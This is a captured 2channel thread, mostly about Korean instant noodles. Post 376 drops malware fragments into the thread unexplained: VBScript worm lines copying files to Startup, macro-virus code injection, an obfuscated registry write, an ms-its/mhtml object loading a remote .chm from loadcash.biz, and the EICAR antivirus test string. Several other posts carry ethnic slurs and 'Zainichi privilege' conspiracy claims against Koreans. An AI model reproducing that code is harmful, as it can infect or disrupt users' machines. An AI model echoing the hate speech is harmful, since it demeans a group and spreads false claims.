安いチーズなどぶち込むとなお結構。

372 :すぐ名無し、すごく名無し:2006/04/17(月) 20:20:25 ID:Qn1Y1pJH
                  ゝ、ゝ = 〃ソノ__/   / y'"J | \` ヽ
   rn,              rfレ`ー-=-‐''~ ̄   /`7  `、|  ヽ-'ヽ
  rJllル7       rnh;   l´ ´'リ  ,rn     / r'ン==ト、!__  V ヽ
  〉__ソ       ヾヽ``ij'l 〉 /、,ハjjj し'l mhレ'   /f" |リレ7,,m〉  |  |
  |  {   rfjn   ,;'V _ン',/ //〉r>,、__//リリ ト  〈 }'=‐' ソ 〉トii,_/  j
  .|  i _,-;ゝ_ソ  {' ' 'V V /'ハ~ ' ノヽ ヽ,;ヾ レ'⌒jー'-ン Λ'ー'~ヽ,  /
    ! V;;;ゞ''~ ̄ヽ_〉_j,;|  ヽ/レ_>' ラ';;/;-‐-{〉⌒|!    / /     〉"
   }  V       }リ レヽ  ヽ彡';,、-l ・ ・ ゜j、=ヾヽ / / `` _,‐'"
   Y´~j!_    ji!_,-' ヾ,ヽ,=''`ヽ,;;; ;,トー-‐'j リヽ,;'_>' ,/ ‐= |
   .{   `ー=''" 、、 」、|/~`ヽ,;;;:;.〉、__,,ソ 〉‐''‐、. /   彡 |
    ヾ ``_  _  〃レ' jトヽ  ''"7~~ ̄ ~^'く   リ  - =' ‐ {
     V ~^ ̄ //,├'"   V/        、、ン'k  =-‐ ''j
     }      / |     Y         〃,;'{ニ二 jニi ̄]
World Baseball Classic

3/19(Sun) Place サン・ディエゴ ペトコ・パーク

Japan6−0Korea

and after Japan be World champion




373 :すぐ名無し、すごく名無し:2006/08/03(木) 12:42:09 ID:0KKEF7vp
カップのキムチラーメンを食った。
日本のメーカーのキムチラーメンとは比べ物にならん。マジうま。

374 :すぐ名無し、すごく名無し:2006/08/03(木) 13:08:07 ID:nGFQ/jtR


375 :すぐ名無し、すごく名無し:2006/10/17(火) 11:31:06 ID:9FgFzcj7
うんこ食べる世界唯一の民族だから、味覚がおかしいのも頷ける<チョン麺

376 :すぐ名無し、すごく名無し:2006/10/17(火) 13:25:24 ID:naWXueLk
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub




377 :もぐもぐ名無しさん:2006/10/19(木) 10:46:01 ID:6SNRlPDP
153 名前:日本人には知る権利があります!! :2006/10/19(木) 10:36:36
動画です。消される前に見てちょーだい。

http://vision.ameba.jp/watch.do?movie=50002
安倍幹事長(当時)が民主党(ジャスコ岡田)と社民党(福島瑞穂)の姿勢を正す。

http://vision.ameba.jp/watch.do?movie=49956
社民党 在日土井たかこ
「北朝鮮による日本人拉致はでっちあげニダ」

http://vision.ameba.jp/watch.do?movie=49367
在日特権の話 vip待遇ですねぇ

http://vision.ameba.jp/watch.do?movie=49029
朝鮮人の触れてほしくない話


378 :もぐもぐ名無しさん:2006/10/19(木) 10:47:23 ID:6SNRlPDP
韓国名物 汚食品(グロ注意。虫入り 痰入り等)
http://blog.livedoor.jp/baiding/archives/50128198.html

379 :もぐもぐ名無しさん :2006/10/30(月) 16:00:33 ID:ZPK7n1k2
277 :もぐもぐ名無しさん :2006/10/29(日) 07:15:13
■在日特権の闇  大阪朝鮮人大量居住区

http://www.ocec.ne.jp/es/kitatatumi-es/kitatatsumi-index.htm
http://www.ocec.ne.jp/es/kitatatumi-es/minzoku.htm
↑大阪市立北巽小学校のホームページ

市立小学校のホームページがこんな具合。
公立なのに朝鮮民族教育。
テストに名前を書くときも、日本語とハングルを併記しなくてはならない。
大阪だけで、公立学校の在日コリアンの教師数が今年100人を超えた。

自分の子供の担任が在日コリアン。
朝鮮人教師による洗脳教育、誤った歴史観・・・
現在、そういう状況におかれている日本人の親御さんは多いし、私たちにとっても十分ありうることです。




380 :もぐもぐ名無しさん:2006/12/19(火) 12:20:03 ID:jGs+Yb+4
ノグリが一番好き。たぶんうどんと昔名乗ってうどん風な太麺。韓国は牛の出しが多い中、海鮮の出しが良いです。辛ラーメン食べるが、良さが分からない。

381 :すぐ名無し、すごく名無し:2007/01/17(水) 12:29:53 ID:7K392n0E
名古屋人じゃないが八丁味噌みたいな味のチャパゲティが好き。
これ愛知県辺りで売れる気がする。

382 :すぐ名無し、すごく名無し:2007/01/27(土) 23:22:08 ID:Xq1sOUm/
韓国内のブテチゲを食わせる店では一般的に
どのインスタント麺が使われてるのだろうか?

383 :すぐ名無し、すごく名無し:2007/02/02(金) 03:36:03 ID:vo95k9/x
>>382
業務用スープなしインスタント麺

97 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)